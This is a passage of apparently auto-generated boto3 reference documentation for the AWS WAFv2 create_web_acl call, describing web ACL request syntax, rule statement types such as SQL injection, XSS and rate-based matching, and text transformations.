'Type': 'NONE'|'COMPRESS_WHITE_SPACE'|'HTML_ENTITY_DECODE'|'LOWERCASE'|'CMD_LINE'|'URL_DECODE'
},
]
},
'RateBasedStatement': {
'Limit': 123,
'AggregateKeyType': 'IP',
'ScopeDownStatement': {'... recursive ...'}
},
'AndStatement': {
'Statements': [
{'... recursive ...'},
]
},
'OrStatement': {
'Statements': [
{'... recursive ...'},
]
},
'NotStatement': {
'Statement': {'... recursive ...'}
},
'ManagedRuleGroupStatement': {
'VendorName': 'string',
'Name': 'string',
'ExcludedRules': [
{
'Name': 'string'
},
]
}
},
'Action': {
'Block': {}
,
'Allow': {}
,
'Count': {}
},
'OverrideAction': {
'Count': {}
,
'None': {}
},
'VisibilityConfig': {
'SampledRequestsEnabled': True|False,
'CloudWatchMetricsEnabled': True|False,
'MetricName': 'string'
}
},
],
VisibilityConfig={
'SampledRequestsEnabled': True|False,
'CloudWatchMetricsEnabled': True|False,
'MetricName': 'string'
},
Tags=[
{
'Key': 'string',
'Value': 'string'
},
]
)
:type Name: string
:param Name: [REQUIRED]\nThe name of the Web ACL. You cannot change the name of a Web ACL after you create it.\n
:type Scope: string
:param Scope: [REQUIRED]\nSpecifies whether this is for an AWS CloudFront distribution or for a regional application. A regional application can be an Application Load Balancer (ALB) or an API Gateway stage.\nTo work with CloudFront, you must also specify the Region US East (N. Virginia) as follows:\n\nCLI - Specify the Region when you use the CloudFront scope: --scope=CLOUDFRONT --region=us-east-1 .\nAPI and SDKs - For all calls, use the Region endpoint us-east-1.\n\n
:type DefaultAction: dict
:param DefaultAction: [REQUIRED]\nThe action to perform if none of the Rules contained in the WebACL match.\n\nBlock (dict) --Specifies that AWS WAF should block requests by default.\n\nAllow (dict) --Specifies that AWS WAF should allow requests by default.\n\n\n
:type Description: string
:param Description: A description of the Web ACL that helps with identification. You cannot change the description of a Web ACL after you create it.
:type Rules: list
:param Rules: The Rule statements used to identify the web requests that you want to allow, block, or count. Each rule includes one top-level statement that AWS WAF uses to identify matching web requests, and parameters that govern how AWS WAF handles them.\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nA single rule, which you can use in a WebACL or RuleGroup to identify web requests that you want to allow, block, or count. Each rule includes one top-level Statement that AWS WAF uses to identify matching web requests, and parameters that govern how AWS WAF handles them.\n\nName (string) -- [REQUIRED]The name of the rule. You can\'t change the name of a Rule after you create it.\n\nPriority (integer) -- [REQUIRED]If you define more than one Rule in a WebACL , AWS WAF evaluates each request against the Rules in order based on the value of Priority . AWS WAF processes rules with lower priority first. The priorities don\'t need to be consecutive, but they must all be different.\n\nStatement (dict) -- [REQUIRED]The AWS WAF processing statement for the rule, for example ByteMatchStatement or SizeConstraintStatement .\n\nByteMatchStatement (dict) --A rule statement that defines a string match search for AWS WAF to apply to web requests. The byte match statement provides the bytes to search for, the location in requests that you want AWS WAF to search, and other settings. The bytes to search for are typically a string that corresponds with ASCII characters. In the AWS WAF console and the developer guide, this is refered to as a string match statement.\n\nSearchString (bytes) -- [REQUIRED]A string value that you want AWS WAF to search for. AWS WAF searches only in the part of web requests that you designate for inspection in FieldToMatch . The maximum length of the value is 50 bytes.\nValid values depend on the component that you specify for inspection in FieldToMatch :\n\nMethod : The HTTP method that you want AWS WAF to search for. This indicates the type of operation specified in the request.\nUriPath : The value that you want AWS WAF to search for in the URI path, for example, /images/daily-ad.jpg .\n\nIf SearchString includes alphabetic characters A-Z and a-z, note that the value is case sensitive.\n\nIf you\'re using the AWS WAF API\nSpecify a base64-encoded version of the value. The maximum length of the value before you base64-encode it is 50 bytes.\nFor example, suppose the value of Type is HEADER and the value of Data is User-Agent . If you want to search the User-Agent header for the value BadBot , you base64-encode BadBot using MIME base64-encoding and include the resulting value, QmFkQm90 , in the value of SearchString .\n\nIf you\'re using the AWS CLI or one of the AWS SDKs\nThe value that you want AWS WAF to search for. The SDK automatically base64 encodes the value.\n\nFieldToMatch (dict) -- [REQUIRED]The part of a web request that you want AWS WAF to inspect. For more information, see FieldToMatch .\n\nSingleHeader (dict) --Inspect a single header. Provide the name of the header to inspect, for example, User-Agent or Referer . This setting isn\'t case sensitive.\n\nName (string) -- [REQUIRED]The name of the query header to inspect.\n\n\n\nSingleQueryArgument (dict) --Inspect a single query argument. Provide the name of the query argument to inspect, such as UserName or SalesRegion . 
The name can be up to 30 characters long and isn\'t case sensitive.\nThis is used only to indicate the web request component for AWS WAF to inspect, in the FieldToMatch specification.\n\nName (string) -- [REQUIRED]The name of the query argument to inspect.\n\n\n\nAllQueryArguments (dict) --Inspect all query arguments.\n\nUriPath (dict) --Inspect the request URI path. This is the part of a web request that identifies a resource, for example, /images/daily-ad.jpg .\n\nQueryString (dict) --Inspect the query string. This is the part of a URL that appears after a ? character, if any.\n\nBody (dict) --Inspect the request body, which immediately follows the request headers. This is the part of a request that contains any additional data that you want to send to your web server as the HTTP request body, such as data from a form.\nNote that only the first 8 KB (8192 bytes) of the request body are forwarded to AWS WAF for inspection by the underlying host service. If you don\'t need to inspect more than 8 KB, you can guarantee that you don\'t allow additional bytes in by combining a statement that inspects the body of the web request, such as ByteMatchStatement or RegexPatternSetReferenceStatement , with a SizeConstraintStatement that enforces an 8 KB size limit on the body of the request. AWS WAF doesn\'t support inspecting the entire contents of web requests whose bodies exceed the 8 KB limit.\n\nMethod (dict) --Inspect the HTTP method. The method indicates the type of operation that the request is asking the origin to perform.\n\n\n\nTextTransformations (list) -- [REQUIRED]Text transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection. If you specify one or more transformations in a rule statement, AWS WAF performs all transformations on the content of the request component identified by FieldToMatch , starting from the lowest priority setting, before inspecting the content for a match.\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nText transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection.\n\nPriority (integer) -- [REQUIRED]Sets the relative processing order for multiple transformations that are defined for a rule statement. AWS WAF processes all transformations, from lowest priority to highest, before inspecting the transformed content. 
The priorities don\'t need to be consecutive, but they must all be different.\n\nType (string) -- [REQUIRED]You can specify the following transformation types:\n\nCMD_LINE\nWhen you\'re concerned that attackers are injecting an operating system command line command and using unusual formatting to disguise some or all of the command, use this option to perform the following transformations:\n\nDelete the following characters: ' \' ^\nDelete spaces before the following characters: / (\nReplace the following characters with a space: , ;\nReplace multiple spaces with one space\nConvert uppercase letters (A-Z) to lowercase (a-z)\n\n\nCOMPRESS_WHITE_SPACE\nUse this option to replace the following characters with a space character (decimal 32):\n\nf, formfeed, decimal 12\nt, tab, decimal 9\nn, newline, decimal 10\nr, carriage return, decimal 13\nv, vertical tab, decimal 11\nnon-breaking space, decimal 160\n\n\nCOMPRESS_WHITE_SPACE also replaces multiple spaces with one space.HTML_ENTITY_DECODE\n\nUse this option to replace HTML-encoded characters with unencoded characters. HTML_ENTITY_DECODE performs the following operations:\n\nReplaces (ampersand)quot; with '\nReplaces (ampersand)nbsp; with a non-breaking space, decimal 160\nReplaces (ampersand)lt; with a 'less than' symbol\nReplaces (ampersand)gt; with >\nReplaces characters that are represented in hexadecimal format, (ampersand)#xhhhh; , with the corresponding characters\nReplaces characters that are represented in decimal format, (ampersand)#nnnn; , with the corresponding characters\n\n\nLOWERCASE\nUse this option to convert uppercase letters (A-Z) to lowercase (a-z).\n\nURL_DECODE\nUse this option to decode a URL-encoded value.\n\nNONE\nSpecify NONE if you don\'t want any text transformations.\n\n\n\n\n\nPositionalConstraint (string) -- [REQUIRED]The area within the portion of a web request that you want AWS WAF to search for SearchString . Valid values include the following:\n\nCONTAINS\nThe specified part of the web request must include the value of SearchString , but the location doesn\'t matter.\n\nCONTAINS_WORD\nThe specified part of the web request must include the value of SearchString , and SearchString must contain only alphanumeric characters or underscore (A-Z, a-z, 0-9, or _). In addition, SearchString must be a word, which means that both of the following are true:\n\nSearchString is at the beginning of the specified part of the web request or is preceded by a character other than an alphanumeric character or underscore (_). Examples include the value of a header and ;BadBot .\nSearchString is at the end of the specified part of the web request or is followed by a character other than an alphanumeric character or underscore (_), for example, BadBot; and -BadBot; .\n\n\nEXACTLY\nThe value of the specified part of the web request must exactly match the value of SearchString .\n\nSTARTS_WITH\nThe value of SearchString must appear at the beginning of the specified part of the web request.\n\nENDS_WITH\nThe value of SearchString must appear at the end of the specified part of the web request.\n\n\n\nSqliMatchStatement (dict) --Attackers sometimes insert malicious SQL code into web requests in an effort to extract data from your database. To allow or block web requests that appear to contain malicious SQL code, create one or more SQL injection match conditions. An SQL injection match condition identifies the part of web requests, such as the URI or the query string, that you want AWS WAF to inspect. 
Later in the process, when you create a web ACL, you specify whether to allow or block requests that appear to contain malicious SQL code.\n\nFieldToMatch (dict) -- [REQUIRED]The part of a web request that you want AWS WAF to inspect. For more information, see FieldToMatch .\n\nSingleHeader (dict) --Inspect a single header. Provide the name of the header to inspect, for example, User-Agent or Referer . This setting isn\'t case sensitive.\n\nName (string) -- [REQUIRED]The name of the query header to inspect.\n\n\n\nSingleQueryArgument (dict) --Inspect a single query argument. Provide the name of the query argument to inspect, such as UserName or SalesRegion . The name can be up to 30 characters long and isn\'t case sensitive.\nThis is used only to indicate the web request component for AWS WAF to inspect, in the FieldToMatch specification.\n\nName (string) -- [REQUIRED]The name of the query argument to inspect.\n\n\n\nAllQueryArguments (dict) --Inspect all query arguments.\n\nUriPath (dict) --Inspect the request URI path. This is the part of a web request that identifies a resource, for example, /images/daily-ad.jpg .\n\nQueryString (dict) --Inspect the query string. This is the part of a URL that appears after a ? character, if any.\n\nBody (dict) --Inspect the request body, which immediately follows the request headers. This is the part of a request that contains any additional data that you want to send to your web server as the HTTP request body, such as data from a form.\nNote that only the first 8 KB (8192 bytes) of the request body are forwarded to AWS WAF for inspection by the underlying host service. If you don\'t need to inspect more than 8 KB, you can guarantee that you don\'t allow additional bytes in by combining a statement that inspects the body of the web request, such as ByteMatchStatement or RegexPatternSetReferenceStatement , with a SizeConstraintStatement that enforces an 8 KB size limit on the body of the request. AWS WAF doesn\'t support inspecting the entire contents of web requests whose bodies exceed the 8 KB limit.\n\nMethod (dict) --Inspect the HTTP method. The method indicates the type of operation that the request is asking the origin to perform.\n\n\n\nTextTransformations (list) -- [REQUIRED]Text transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection. If you specify one or more transformations in a rule statement, AWS WAF performs all transformations on the content of the request component identified by FieldToMatch , starting from the lowest priority setting, before inspecting the content for a match.\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nText transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection.\n\nPriority (integer) -- [REQUIRED]Sets the relative processing order for multiple transformations that are defined for a rule statement. AWS WAF processes all transformations, from lowest priority to highest, before inspecting the transformed content. 
The priorities don\'t need to be consecutive, but they must all be different.\n\nType (string) -- [REQUIRED]You can specify the following transformation types:\n\nCMD_LINE\nWhen you\'re concerned that attackers are injecting an operating system command line command and using unusual formatting to disguise some or all of the command, use this option to perform the following transformations:\n\nDelete the following characters: ' \' ^\nDelete spaces before the following characters: / (\nReplace the following characters with a space: , ;\nReplace multiple spaces with one space\nConvert uppercase letters (A-Z) to lowercase (a-z)\n\n\nCOMPRESS_WHITE_SPACE\nUse this option to replace the following characters with a space character (decimal 32):\n\nf, formfeed, decimal 12\nt, tab, decimal 9\nn, newline, decimal 10\nr, carriage return, decimal 13\nv, vertical tab, decimal 11\nnon-breaking space, decimal 160\n\n\nCOMPRESS_WHITE_SPACE also replaces multiple spaces with one space.HTML_ENTITY_DECODE\n\nUse this option to replace HTML-encoded characters with unencoded characters. HTML_ENTITY_DECODE performs the following operations:\n\nReplaces (ampersand)quot; with '\nReplaces (ampersand)nbsp; with a non-breaking space, decimal 160\nReplaces (ampersand)lt; with a 'less than' symbol\nReplaces (ampersand)gt; with >\nReplaces characters that are represented in hexadecimal format, (ampersand)#xhhhh; , with the corresponding characters\nReplaces characters that are represented in decimal format, (ampersand)#nnnn; , with the corresponding characters\n\n\nLOWERCASE\nUse this option to convert uppercase letters (A-Z) to lowercase (a-z).\n\nURL_DECODE\nUse this option to decode a URL-encoded value.\n\nNONE\nSpecify NONE if you don\'t want any text transformations.\n\n\n\n\n\n\n\nXssMatchStatement (dict) --A rule statement that defines a cross-site scripting (XSS) match search for AWS WAF to apply to web requests. XSS attacks are those where the attacker uses vulnerabilities in a benign website as a vehicle to inject malicious client-site scripts into other legitimate web browsers. The XSS match statement provides the location in requests that you want AWS WAF to search and text transformations to use on the search area before AWS WAF searches for character sequences that are likely to be malicious strings.\n\nFieldToMatch (dict) -- [REQUIRED]The part of a web request that you want AWS WAF to inspect. For more information, see FieldToMatch .\n\nSingleHeader (dict) --Inspect a single header. Provide the name of the header to inspect, for example, User-Agent or Referer . This setting isn\'t case sensitive.\n\nName (string) -- [REQUIRED]The name of the query header to inspect.\n\n\n\nSingleQueryArgument (dict) --Inspect a single query argument. Provide the name of the query argument to inspect, such as UserName or SalesRegion . The name can be up to 30 characters long and isn\'t case sensitive.\nThis is used only to indicate the web request component for AWS WAF to inspect, in the FieldToMatch specification.\n\nName (string) -- [REQUIRED]The name of the query argument to inspect.\n\n\n\nAllQueryArguments (dict) --Inspect all query arguments.\n\nUriPath (dict) --Inspect the request URI path. This is the part of a web request that identifies a resource, for example, /images/daily-ad.jpg .\n\nQueryString (dict) --Inspect the query string. This is the part of a URL that appears after a ? character, if any.\n\nBody (dict) --Inspect the request body, which immediately follows the request headers. 
This is the part of a request that contains any additional data that you want to send to your web server as the HTTP request body, such as data from a form.\nNote that only the first 8 KB (8192 bytes) of the request body are forwarded to AWS WAF for inspection by the underlying host service. If you don\'t need to inspect more than 8 KB, you can guarantee that you don\'t allow additional bytes in by combining a statement that inspects the body of the web request, such as ByteMatchStatement or RegexPatternSetReferenceStatement , with a SizeConstraintStatement that enforces an 8 KB size limit on the body of the request. AWS WAF doesn\'t support inspecting the entire contents of web requests whose bodies exceed the 8 KB limit.\n\nMethod (dict) --Inspect the HTTP method. The method indicates the type of operation that the request is asking the origin to perform.\n\n\n\nTextTransformations (list) -- [REQUIRED]Text transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection. If you specify one or more transformations in a rule statement, AWS WAF performs all transformations on the content of the request component identified by FieldToMatch , starting from the lowest priority setting, before inspecting the content for a match.\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nText transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection.\n\nPriority (integer) -- [REQUIRED]Sets the relative processing order for multiple transformations that are defined for a rule statement. AWS WAF processes all transformations, from lowest priority to highest, before inspecting the transformed content. The priorities don\'t need to be consecutive, but they must all be different.\n\nType (string) -- [REQUIRED]You can specify the following transformation types:\n\nCMD_LINE\nWhen you\'re concerned that attackers are injecting an operating system command line command and using unusual formatting to disguise some or all of the command, use this option to perform the following transformations:\n\nDelete the following characters: ' \' ^\nDelete spaces before the following characters: / (\nReplace the following characters with a space: , ;\nReplace multiple spaces with one space\nConvert uppercase letters (A-Z) to lowercase (a-z)\n\n\nCOMPRESS_WHITE_SPACE\nUse this option to replace the following characters with a space character (decimal 32):\n\nf, formfeed, decimal 12\nt, tab, decimal 9\nn, newline, decimal 10\nr, carriage return, decimal 13\nv, vertical tab, decimal 11\nnon-breaking space, decimal 160\n\n\nCOMPRESS_WHITE_SPACE also replaces multiple spaces with one space.HTML_ENTITY_DECODE\n\nUse this option to replace HTML-encoded characters with unencoded characters. 
HTML_ENTITY_DECODE performs the following operations:\n\nReplaces (ampersand)quot; with '\nReplaces (ampersand)nbsp; with a non-breaking space, decimal 160\nReplaces (ampersand)lt; with a 'less than' symbol\nReplaces (ampersand)gt; with >\nReplaces characters that are represented in hexadecimal format, (ampersand)#xhhhh; , with the corresponding characters\nReplaces characters that are represented in decimal format, (ampersand)#nnnn; , with the corresponding characters\n\n\nLOWERCASE\nUse this option to convert uppercase letters (A-Z) to lowercase (a-z).\n\nURL_DECODE\nUse this option to decode a URL-encoded value.\n\nNONE\nSpecify NONE if you don\'t want any text transformations.\n\n\n\n\n\n\n\nSizeConstraintStatement (dict) --A rule statement that compares a number of bytes against the size of a request component, using a comparison operator, such as greater than (>) or less than (<). For example, you can use a size constraint statement to look for query strings that are longer than 100 bytes.\nIf you configure AWS WAF to inspect the request body, AWS WAF inspects only the first 8192 bytes (8 KB). If the request body for your web requests never exceeds 8192 bytes, you can create a size constraint condition and block requests that have a request body greater than 8192 bytes.\nIf you choose URI for the value of Part of the request to filter on, the slash (/) in the URI counts as one character. For example, the URI /logo.jpg is nine characters long.\n\nFieldToMatch (dict) -- [REQUIRED]The part of a web request that you want AWS WAF to inspect. For more information, see FieldToMatch .\n\nSingleHeader (dict) --Inspect a single header. Provide the name of the header to inspect, for example, User-Agent or Referer . This setting isn\'t case sensitive.\n\nName (string) -- [REQUIRED]The name of the query header to inspect.\n\n\n\nSingleQueryArgument (dict) --Inspect a single query argument. Provide the name of the query argument to inspect, such as UserName or SalesRegion . The name can be up to 30 characters long and isn\'t case sensitive.\nThis is used only to indicate the web request component for AWS WAF to inspect, in the FieldToMatch specification.\n\nName (string) -- [REQUIRED]The name of the query argument to inspect.\n\n\n\nAllQueryArguments (dict) --Inspect all query arguments.\n\nUriPath (dict) --Inspect the request URI path. This is the part of a web request that identifies a resource, for example, /images/daily-ad.jpg .\n\nQueryString (dict) --Inspect the query string. This is the part of a URL that appears after a ? character, if any.\n\nBody (dict) --Inspect the request body, which immediately follows the request headers. This is the part of a request that contains any additional data that you want to send to your web server as the HTTP request body, such as data from a form.\nNote that only the first 8 KB (8192 bytes) of the request body are forwarded to AWS WAF for inspection by the underlying host service. If you don\'t need to inspect more than 8 KB, you can guarantee that you don\'t allow additional bytes in by combining a statement that inspects the body of the web request, such as ByteMatchStatement or RegexPatternSetReferenceStatement , with a SizeConstraintStatement that enforces an 8 KB size limit on the body of the request. AWS WAF doesn\'t support inspecting the entire contents of web requests whose bodies exceed the 8 KB limit.\n\nMethod (dict) --Inspect the HTTP method. 
The method indicates the type of operation that the request is asking the origin to perform.\n\n\n\nComparisonOperator (string) -- [REQUIRED]The operator to use to compare the request part to the size setting.\n\nSize (integer) -- [REQUIRED]The size, in byte, to compare to the request part, after any transformations.\n\nTextTransformations (list) -- [REQUIRED]Text transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection. If you specify one or more transformations in a rule statement, AWS WAF performs all transformations on the content of the request component identified by FieldToMatch , starting from the lowest priority setting, before inspecting the content for a match.\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nText transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection.\n\nPriority (integer) -- [REQUIRED]Sets the relative processing order for multiple transformations that are defined for a rule statement. AWS WAF processes all transformations, from lowest priority to highest, before inspecting the transformed content. The priorities don\'t need to be consecutive, but they must all be different.\n\nType (string) -- [REQUIRED]You can specify the following transformation types:\n\nCMD_LINE\nWhen you\'re concerned that attackers are injecting an operating system command line command and using unusual formatting to disguise some or all of the command, use this option to perform the following transformations:\n\nDelete the following characters: ' \' ^\nDelete spaces before the following characters: / (\nReplace the following characters with a space: , ;\nReplace multiple spaces with one space\nConvert uppercase letters (A-Z) to lowercase (a-z)\n\n\nCOMPRESS_WHITE_SPACE\nUse this option to replace the following characters with a space character (decimal 32):\n\nf, formfeed, decimal 12\nt, tab, decimal 9\nn, newline, decimal 10\nr, carriage return, decimal 13\nv, vertical tab, decimal 11\nnon-breaking space, decimal 160\n\n\nCOMPRESS_WHITE_SPACE also replaces multiple spaces with one space.HTML_ENTITY_DECODE\n\nUse this option to replace HTML-encoded characters with unencoded characters. 
HTML_ENTITY_DECODE performs the following operations:\n\nReplaces (ampersand)quot; with '\nReplaces (ampersand)nbsp; with a non-breaking space, decimal 160\nReplaces (ampersand)lt; with a 'less than' symbol\nReplaces (ampersand)gt; with >\nReplaces characters that are represented in hexadecimal format, (ampersand)#xhhhh; , with the corresponding characters\nReplaces characters that are represented in decimal format, (ampersand)#nnnn; , with the corresponding characters\n\n\nLOWERCASE\nUse this option to convert uppercase letters (A-Z) to lowercase (a-z).\n\nURL_DECODE\nUse this option to decode a URL-encoded value.\n\nNONE\nSpecify NONE if you don\'t want any text transformations.\n\n\n\n\n\n\n\nGeoMatchStatement (dict) --A rule statement used to identify web requests based on country of origin.\n\nCountryCodes (list) --An array of two-character country codes, for example, [ 'US', 'CN' ] , from the alpha-2 country ISO codes of the ISO 3166 international standard.\n\n(string) --\n\n\n\n\nRuleGroupReferenceStatement (dict) --A rule statement used to run the rules that are defined in a RuleGroup . To use this, create a rule group with your rules, then provide the ARN of the rule group in this statement.\nYou cannot nest a RuleGroupReferenceStatement , for example for use inside a NotStatement or OrStatement . It can only be referenced as a top-level statement within a rule.\n\nARN (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the entity.\n\nExcludedRules (list) --The names of rules that are in the referenced rule group, but that you want AWS WAF to exclude from processing for this rule statement.\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nSpecifies a single rule to exclude from the rule group. Excluding a rule overrides its action setting for the rule group in the web ACL, setting it to COUNT . This effectively excludes the rule from acting on web requests.\n\nName (string) -- [REQUIRED]The name of the rule to exclude.\n\n\n\n\n\n\n\nIPSetReferenceStatement (dict) --A rule statement used to detect web requests coming from particular IP addresses or address ranges. To use this, create an IPSet that specifies the addresses you want to detect, then use the ARN of that set in this statement. To create an IP set, see CreateIPSet .\nEach IP set rule statement references an IP set. You create and maintain the set independent of your rules. This allows you to use the single set in multiple rules. When you update the referenced set, AWS WAF automatically updates all rules that reference it.\n\nARN (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the IPSet that this statement references.\n\n\n\nRegexPatternSetReferenceStatement (dict) --A rule statement used to search web request components for matches with regular expressions. To use this, create a RegexPatternSet that specifies the expressions that you want to detect, then use the ARN of that set in this statement. A web request matches the pattern set rule statement if the request component matches any of the patterns in the set. To create a regex pattern set, see CreateRegexPatternSet .\nEach regex pattern set rule statement references a regex pattern set. You create and maintain the set independent of your rules. This allows you to use the single set in multiple rules. 
When you update the referenced set, AWS WAF automatically updates all rules that reference it.\n\nARN (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the RegexPatternSet that this statement references.\n\nFieldToMatch (dict) -- [REQUIRED]The part of a web request that you want AWS WAF to inspect. For more information, see FieldToMatch .\n\nSingleHeader (dict) --Inspect a single header. Provide the name of the header to inspect, for example, User-Agent or Referer . This setting isn\'t case sensitive.\n\nName (string) -- [REQUIRED]The name of the query header to inspect.\n\n\n\nSingleQueryArgument (dict) --Inspect a single query argument. Provide the name of the query argument to inspect, such as UserName or SalesRegion . The name can be up to 30 characters long and isn\'t case sensitive.\nThis is used only to indicate the web request component for AWS WAF to inspect, in the FieldToMatch specification.\n\nName (string) -- [REQUIRED]The name of the query argument to inspect.\n\n\n\nAllQueryArguments (dict) --Inspect all query arguments.\n\nUriPath (dict) --Inspect the request URI path. This is the part of a web request that identifies a resource, for example, /images/daily-ad.jpg .\n\nQueryString (dict) --Inspect the query string. This is the part of a URL that appears after a ? character, if any.\n\nBody (dict) --Inspect the request body, which immediately follows the request headers. This is the part of a request that contains any additional data that you want to send to your web server as the HTTP request body, such as data from a form.\nNote that only the first 8 KB (8192 bytes) of the request body are forwarded to AWS WAF for inspection by the underlying host service. If you don\'t need to inspect more than 8 KB, you can guarantee that you don\'t allow additional bytes in by combining a statement that inspects the body of the web request, such as ByteMatchStatement or RegexPatternSetReferenceStatement , with a SizeConstraintStatement that enforces an 8 KB size limit on the body of the request. AWS WAF doesn\'t support inspecting the entire contents of web requests whose bodies exceed the 8 KB limit.\n\nMethod (dict) --Inspect the HTTP method. The method indicates the type of operation that the request is asking the origin to perform.\n\n\n\nTextTransformations (list) -- [REQUIRED]Text transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection. If you specify one or more transformations in a rule statement, AWS WAF performs all transformations on the content of the request component identified by FieldToMatch , starting from the lowest priority setting, before inspecting the content for a match.\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nText transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection.\n\nPriority (integer) -- [REQUIRED]Sets the relative processing order for multiple transformations that are defined for a rule statement. AWS WAF processes all transformations, from lowest priority to highest, before inspecting the transformed content. 
The priorities don\'t need to be consecutive, but they must all be different.\n\nType (string) -- [REQUIRED]You can specify the following transformation types:\n\nCMD_LINE\nWhen you\'re concerned that attackers are injecting an operating system command line command and using unusual formatting to disguise some or all of the command, use this option to perform the following transformations:\n\nDelete the following characters: ' \' ^\nDelete spaces before the following characters: / (\nReplace the following characters with a space: , ;\nReplace multiple spaces with one space\nConvert uppercase letters (A-Z) to lowercase (a-z)\n\n\nCOMPRESS_WHITE_SPACE\nUse this option to replace the following characters with a space character (decimal 32):\n\nf, formfeed, decimal 12\nt, tab, decimal 9\nn, newline, decimal 10\nr, carriage return, decimal 13\nv, vertical tab, decimal 11\nnon-breaking space, decimal 160\n\n\nCOMPRESS_WHITE_SPACE also replaces multiple spaces with one space.HTML_ENTITY_DECODE\n\nUse this option to replace HTML-encoded characters with unencoded characters. HTML_ENTITY_DECODE performs the following operations:\n\nReplaces (ampersand)quot; with '\nReplaces (ampersand)nbsp; with a non-breaking space, decimal 160\nReplaces (ampersand)lt; with a 'less than' symbol\nReplaces (ampersand)gt; with >\nReplaces characters that are represented in hexadecimal format, (ampersand)#xhhhh; , with the corresponding characters\nReplaces characters that are represented in decimal format, (ampersand)#nnnn; , with the corresponding characters\n\n\nLOWERCASE\nUse this option to convert uppercase letters (A-Z) to lowercase (a-z).\n\nURL_DECODE\nUse this option to decode a URL-encoded value.\n\nNONE\nSpecify NONE if you don\'t want any text transformations.\n\n\n\n\n\n\n\nRateBasedStatement (dict) --A rate-based rule tracks the rate of requests for each originating IP address, and triggers the rule action when the rate exceeds a limit that you specify on the number of requests in any 5-minute time span. You can use this to put a temporary block on requests from an IP address that is sending excessive requests.\nWhen the rule action triggers, AWS WAF blocks additional requests from the IP address until the request rate falls below the limit.\nYou can optionally nest another statement inside the rate-based statement, to narrow the scope of the rule so that it only counts requests that match the nested statement. For example, based on recent requests that you have seen from an attacker, you might create a rate-based rule with a nested AND rule statement that contains the following nested statements:\n\nAn IP match statement with an IP set that specified the address 192.0.2.44.\nA string match statement that searches in the User-Agent header for the string BadBot.\n\nIn this rate-based rule, you also define a rate limit. For this example, the rate limit is 1,000. Requests that meet both of the conditions in the statements are counted. If the count exceeds 1,000 requests per five minutes, the rule action triggers. Requests that do not meet both conditions are not counted towards the rate limit and are not affected by this rule.\nYou cannot nest a RateBasedStatement , for example for use inside a NotStatement or OrStatement . It can only be referenced as a top-level statement within a rule.\n\nLimit (integer) -- [REQUIRED]The limit on requests per 5-minute period for a single originating IP address. 
If the statement includes a ScopDownStatement , this limit is applied only to the requests that match the statement.\n\nAggregateKeyType (string) -- [REQUIRED]Setting that indicates how to aggregate the request counts. Currently, you must set this to IP . The request counts are aggregated on IP addresses.\n\nScopeDownStatement (dict) --An optional nested statement that narrows the scope of the rate-based statement to matching web requests. This can be any nestable statement, and you can nest statements at any level below this scope-down statement.\n\n\n\nAndStatement (dict) --A logical rule statement used to combine other rule statements with AND logic. You provide more than one Statement within the AndStatement .\n\nStatements (list) -- [REQUIRED]The statements to combine with AND logic. You can use any statements that can be nested.\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nThe processing guidance for a Rule , used by AWS WAF to determine whether a web request matches the rule.\n\n\n\n\n\nOrStatement (dict) --A logical rule statement used to combine other rule statements with OR logic. You provide more than one Statement within the OrStatement .\n\nStatements (list) -- [REQUIRED]The statements to combine with OR logic. You can use any statements that can be nested.\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nThe processing guidance for a Rule , used by AWS WAF to determine whether a web request matches the rule.\n\n\n\n\n\nNotStatement (dict) --A logical rule statement used to negate the results of another rule statement. You provide one Statement within the NotStatement .\n\nStatement (dict) --The statement to negate. You can use any statement that can be nested.\n\n\n\nManagedRuleGroupStatement (dict) --A rule statement used to run the rules that are defined in a managed rule group. To use this, provide the vendor name and the name of the rule group in this statement. You can retrieve the required names by calling ListAvailableManagedRuleGroups .\nYou can\'t nest a ManagedRuleGroupStatement , for example for use inside a NotStatement or OrStatement . It can only be referenced as a top-level statement within a rule.\n\nVendorName (string) -- [REQUIRED]The name of the managed rule group vendor. You use this, along with the rule group name, to identify the rule group.\n\nName (string) -- [REQUIRED]The name of the managed rule group. You use this, along with the vendor name, to identify the rule group.\n\nExcludedRules (list) --The rules whose actions are set to COUNT by the web ACL, regardless of the action that is set on the rule. This effectively excludes the rule from acting on web requests.\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how 